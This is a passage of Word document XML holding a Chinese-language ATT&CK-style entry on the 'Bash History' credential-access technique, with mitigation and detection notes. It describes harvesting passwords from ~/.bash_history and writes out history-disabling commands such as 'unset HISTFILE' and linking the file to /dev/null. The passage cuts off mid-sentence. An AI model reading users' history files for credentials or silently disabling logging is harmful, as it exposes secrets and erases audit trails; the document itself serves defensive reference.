          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EB09102" w14:textId="3B448232" w:rsidR="00712D90" w:rsidRPr="00671A0D" w:rsidRDefault="00712D90" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>静态路由</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B7FF06" w14:textId="2D548F21" w:rsidR="00712D90" w:rsidRPr="00671A0D" w:rsidRDefault="00712D90" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以设置静态路由，以确保攻击者不会修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MAC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44DFB326" w14:textId="77777777" w:rsidR="00712D90" w:rsidRPr="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A2F22A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F10A16">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>历史</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6B6470C5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3330F745" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4946" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006E4946">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> T1139</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788AECE0" w14:textId="06DB07A9" w:rsidR="000F2665" w:rsidRPr="006E4946" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04AE5347" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4946" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006E4946">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBD6EAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4946" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006E4946">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="344C09A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4946" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006E4946">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641A98CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006E4946">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07472B48" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50542A6B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D6424C" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>history”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实用程序跟踪用户在命令行上键入的命令。用户注销后，会将历史记录刷新到用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>.b</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1AB7">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件中。对于每个用户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件位于相同的位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1AB7">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。通常，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件会跟踪用户的最近</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个命令。用户通常在命令行上键入用户名和密码作为程序的参数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后在注销时将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会被</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件中。攻击者可以通过查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>潜在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用户身份验证信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6424C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC2CBA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="655FA8D9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4A7CBDF3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2E900013" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="1BF0CE8C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21DD85C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A61907C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00586424" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>有多种方法可以防止将用户的命令历史记录刷新到其</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>.bash_history</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>文件，包括使用以下命令：</w:t>
            </w:r>
            <w:r w:rsidRPr="00586424">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>set +o history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00586424">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>set -o history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>重新</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>开始记录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586424">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>unset HISTFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>撤销</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>添加到用户的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00B75931">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>ash_rc</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>文件中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>的操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>；以及</w:t>
            </w:r>
            <w:r w:rsidRPr="00586424">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>ln -s /dev/null ~/.bash_history</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>将命令写入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>/d</w:t>
            </w:r>
            <w:r w:rsidRPr="00872ADF">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>ev/null</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6424C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0030A11D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:color w:val="39434C"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A17740" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>被读取时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，对其进行监视，</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以帮助警告可疑活动。虽然用户通常依赖于他们的命令历史，但他们经常通过其他实用程序（如“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>history</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>”）而不是像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
